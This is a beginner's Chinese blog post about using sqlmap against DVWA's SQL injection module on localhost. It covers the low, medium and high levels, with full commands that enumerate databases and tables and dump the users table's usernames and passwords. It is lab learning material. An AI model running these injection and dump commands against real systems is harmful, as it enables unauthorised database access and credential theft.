sqlmap注入dvwa


第一次写博客,目前自己处于一个新手状态,写一下博客来记录一下学习

今天要记录的是用sqlmap来注入dvwa里的sql注入模块

先从low等级开始

 

 

 

用sqlmap进行爆破:sqlmap -u "url"

 

 

 从得到的结果中能看到我们是需要cookie的,然后去dvwa看一下cookie

 

 

 然后在命令中加入cookie:sqlmap -u "url" --cookie="security=low,PHPSESSID=mtfmtpa2rhgnr887auaudgsm00"

查看数据库,在后面加上 --dbs就行了

 

 

 就得到服务器上所有的数据库,然后简单的分析一下或者穷举就能找到我们要爆破的数据库

然后爆破表:sqlmap -u "url" --cookie="..." -D dvwa --tables

 

 

 得到数据表

接下来就是爆破列:sqlmap -u "url" --cookie="..." -D dvwa -T users --columns

 

 

 然后再爆破字段:sqlmap -u "url" --cookie="..." -D dvwa -T users -C user,password --dump

 

 然后就得到了所有的用户名和密码

 

然后是medium

这里的传输方式改成了post所以url中没有参数,我们用burpsuite抓包看一下参数

 

 由于是post传输,所以这里要用--data把数据引入过来:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小写)" --cookie="security=medium;PHPSESSID=...." --dbs

然后接下来的步骤就和上面的一样了:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小写)" --cookie="security=medium;PHPSESSID=...." -D dvwa -T users -C user,password --dump

然后是high等级

 

 high等级这里是一个链接点击过后会跳转到另一个页面,这个如果用sqlmap进行爆破就要设计到二阶sql注入:有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。-–second-order后面跟一个判断页面的URL地址。

首先还是用burpsuite进行抓包查看参数可以发现是与medium是类似的:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" --dbs

然后再与上面的步骤一样就可以了:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" -D dvwa -T users -C user,password --dump

  

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM